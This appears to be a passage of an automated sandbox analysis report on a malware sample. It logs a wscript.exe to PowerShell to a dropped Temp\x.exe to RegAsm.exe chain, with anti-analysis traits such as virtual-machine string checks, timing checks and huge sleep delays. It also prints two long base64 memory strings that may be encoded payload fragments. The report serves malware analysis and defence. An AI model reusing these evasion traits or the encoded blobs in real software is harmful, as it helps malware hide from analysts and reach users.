            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 1550000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2FA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 4FA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 5640000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 6640000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 6770000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 7770000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02FBD1C0 rdtsc 6_2_02FBD1C0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3459Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2732Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 0.7 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3536Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5072Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 5688Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5940Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: wscript.exe, 00000001.00000002.1503503334.00000257C8A52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1500731435.00000257C8A4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1501124024.00000257C8A52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW02
            Source: wscript.exe, 00000001.00000003.1501577328.00000257CB370000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1QWEK6sDTqXR2DKoXDaJ6eDMvGhqucXiJRvpglWpuJIrXhIfPNs6T+o1tfbzmwp3IVmaNX9LfwPzvP3D+8PN/sXRlXWe/O/yWiLwtRLrpO9VlXSqDQDG6zfz2inq08hpRuGodvZhgFsKqJMUZ4iM5TzJISGZWkbfnrjMhbOBG/RwuliCeo++AwhvOuxN3V+FiJmngvr+h5OgzsdB7oQV4feOdhelTpIV9t38PquXozp6RdrPbydFrQ9ANT6sEbg34Uvl0B+MFWlnxF3Pag6gn3oPexvuB8riuQd1s5t1BKiTpRuqt2+f+ORW7QYDJUypwokY5HGeuB+4W05SkfKM7b+W0R4Bq/SNbadS/sM+VuhYr4gxpdlp5AdPigO4ThbA1B2ll2glAwQv1mMSgziF4wdhHrAfoU4ed7aq4x2dWEkK2iUw1bMIVSX3MVBFzlIJbw8U5BEiVPhD3z5AcEYIAuIFS87DGGklXnloAuNIJnifeHnO8UXYkGCLtjyf0BYlEMdyehYlDsmC7aout2yTgLV+/QqVgLzyP379ohlDcS9lBdBSuITKs74hIBiyHjNnPwPtrF0uNMw8MxDx7hXFZGdnAZL+8RPs/AhuzgeWtHfzdJErRxiw0l/JpBbiNN78gfkohThJX6+lTNsFgvKAmF7EY51aCGbE4Sp9VmM/VOjI/kdK0Sx7Hizsaa1eYo+4mDpp6Z1zhTyDxH6OdfiDtWZ2qOcTc/mFwelSOn38xRbvGoZC5jbmQxcnU1F9jOdSy6swJptKMY7EI5bJDv0kljNUUeJ4PEwFC9cH/NXynlNVZ0hcuEa3CzLt9nZnupTOQLdYNnoZJhTVXznD6w+7ZfbEwBB/WpUUVer0Oh9gWVGRZ+X+J8U9wuWx2NZmDZEntyA81Ke9VSwvhNoyLrJCZZ9hs16nIfkhXqoRdz5qA/FRtN0spw4oEgiq3BJgFUlMKcgco9ChGbDeLqBsDPBMNuUtQ2ZrS+8wgNoLhD1ZwkwyFXFUkDhxK+t1aZjWdHtGKxM48S8x/fq9wd6iZWp4xvXqeJwnq6S0YJmFbpeXY8DRbmhXA4my4/Fokk4J5glyIk9MecmQ+mgDbs2mTTcIqsMEQQsIWw64WsNeNorr2muEPPiK0NyRK4YFkHOs2IF9gWirjDsLTktXNw45BORaBWl4A9NF92wrtqTzOdpkjiMG/ajXWFXCDsaeNmGUBaQe6BbvPjSsFkz4Lj0GWNteBSP5OkGFcKhK4cd14cooWRs+i7PB52zomcYbI0pMvRsBuHZZS7AC5CCH+6OMAegC7lKQb4iKc7Zi+DfEtlt+fifI0mWVoa0VEF3+VHtKZWmHHGS0CAG1BAZS9r5JG1EJt6y94tJhqpaffRUlJxNXkRfoli5GUD0U6PxBZ6e4K4eyVHSXpNSolOoVi9szsqeJrK9cdmlIYBXInH8H4a5AKZFBqFSylElBMyKihf06x4vJiEMcOkFk6BNlToU06nFhWq8X7UNhrjAZbRK/U1BFlZkWoGPYpz49Ac51f/YqFjDotUeq2ez4M7jQPP4dKdyGBTNvDWD430f0jcgsnVdFGhraZxrqJRrqsBgo1LdsXKrkAqy+Cs323onsnVKJMs1HgfdgqGqZepA3HZgMAdYL7pFvc9URmcGSQ2Nxh8SqaeFUV5jqykv/ODMH2QU7P75xoLiAdV2C9bSD6/2Atvq/39rOsd0NOtWba5Fh6brVOWWiSAvo1PvZjXHyTdjxD/ITa5C/6RAws8bV8k0qBpQYWp34HFPw/Zk+Ymhozcvw3cmkWCigam0pcOLqZHX/Zgi/1lsOSJZ75uONdPO1uGFQaLC3l88wUmg+r7EMBMIOmqz1O7ymzRnLPoL8Hl6KOeeUX5XoMoMViOT1a+pvbwQkAfjFthUkJO2tU4crbYqaYoShXrTL6CqZZ+PtV94u/GEkuqaZjMqQKnpPDgEG59aa7BJbmDmsiXp/H9zuESnRYD7kOwMhc6Q8aDBMXku87GGnYdXa85k4MB+u/jUp7xMQjbbO8y/J8eJh0PsgY8WX+Jjmj97CTl6+uPcMnUmjwiXlVMUbZEQvzpzH3b4WF1Z27awKKiHcxKcgWIIVJ7tHb/sGJIKSIS8megwmDO4n15BzoWz1UuEIPqI8qivMLkz1uCtBFzDJriOict2hoHrP4ejgQgOFnFWiTy7V8mzDWwFivt8mvvDNGyt11uRJiDCQgQNdnfBylZRA0GL564p/7KnvM1BMn99+bHCLROUotJqpPe6AfXGFVH9S/EAngj9bJp23FDsfJ/MyqihJPz3OzK1Pfom4ORgwkw8BgFxHR60y3tuUiSTa82FP2VcLD8hUX5vMj3nQFJD1Hh9PbSfItKjkyFJD0G3HSe0fIgltze+41ifgqXrc9nhlzmIFS9ngJQZcAGcb+INjqVuIts4Uw5pw4StDsBMAeFq1+5fZdXAqxd0evO8wOUh1Txv4rcOnbSDYM2npU0LfypKOyNGSdHqgko09QBaMLk0/hj+7avbWCynEcRZY/8DnweVsGAEBtddb+d4iLOBxf2Ij/3aZtgxbSVS/7tGujn96Jz3KJqmAY7k3MqKb3rCQvuWk2pDeB4tE1ZLmDFx60+eXmnHZrsDsrhGtfqgDfL0Ndh2tJU8kcwISUTIP9XvyK9C34KRAbZFqmri3hMXESk6KHly2XnOYCLcH58vaWR8ZOuLdcMxrkwy66A6Du1mL8Fp/ZmdCHaMn/k/IPT9kpfzTFkBdMP9hGiUKXaAflbPLYE1iu/isSyyXcQBhltbbAdWVFfF0G+3IIaG+kaHhrib5a7+n/Goaw9TjZ5rmGFjU/sYm9ZIQUApgg787FiAO3umLkxPMX5mL7m3H1KtDS8H/UQ2lUoSJwne0HgSIMs1iP0aAs9dlsNi5J7IQTo3jl2mXmvaNurtzghzBfla9lt4SxjX7syHtlmjNgJSrLt8isfuX9v3X77vY17yIYKl/UcdpzKNZNLUUqWsA7jf0z+Cz
            Source: wscript.exe, 00000001.00000003.1501496210.00000257CB470000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
            Source: wscript.exe, 00000001.00000002.1504051186.00000257CAC7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000001.00000002.1503503334.00000257C8A52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1500731435.00000257C8A4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1501124024.00000257C8A52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
            Source: wscript.exe, 00000001.00000003.1501577328.00000257CB370000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
